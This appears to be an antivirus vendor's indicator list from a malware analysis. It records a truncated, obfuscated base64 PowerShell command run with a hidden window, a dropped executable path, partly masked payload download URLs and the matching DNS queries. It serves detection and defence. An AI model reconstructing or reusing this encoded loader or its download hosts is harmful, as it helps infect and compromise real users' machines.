Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGUAXwBtAHYAeQB0AD0AKAAoACcARwAnACsAJwB5ADgAXwAnACkAKwAoACcAYwA2ACcAKwAnAHMAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAE4AdgA6AHUAUwBlAHIAUAByAE8AZgBJAGwAZQBcAE...
- %HOMEPATH%\elxmqaf\vo4x6l2\mbt8k3dl.exe
- %HOMEPATH%\elxmqaf\vo4x6l2\mbt8k3dl.exe
- %HOMEPATH%\elxmqaf\vo4x6l2\mbt8k3dl.exe
- http://st#####osenbusch.com/_/ynWT/
- http://st####buero-nack.de/Grundseite/2HCi55se61/
- http://st##pfer.de/cgi-bin/ZpQCmAkDJfWmY/
- http://su###kemper.de/AH_Horn/Im537a147258755/
- http://su######state-florida.com/cgi-bin/ZgSKUgs/
- http://ta##moga.de/GC/kfa4o59g111198/
- DNS ASK st#####osenbusch.com
- DNS ASK st####buero-nack.de
- DNS ASK st##pfer.de
- DNS ASK su###kemper.de
- DNS ASK su######state-florida.com
- DNS ASK su####computer.de
- DNS ASK ta##moga.de
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNAGUAXwBtAHYAeQB0AD0AKAAoACcARwAnACsAJwB5ADgAXwAnACkAKwAoACcAYwA2ACcAKwAnAHMAJwApACkAOwAmACgAJwBuAGUAdwAtACcAKwAnAGkAdAAnACsAJwBlAG0AJwApACAAJABlAE4AdgA6AHUAUwBlAHIAUAByAE8AZgBJAGwAZQBcAE...' (со скрытым окном)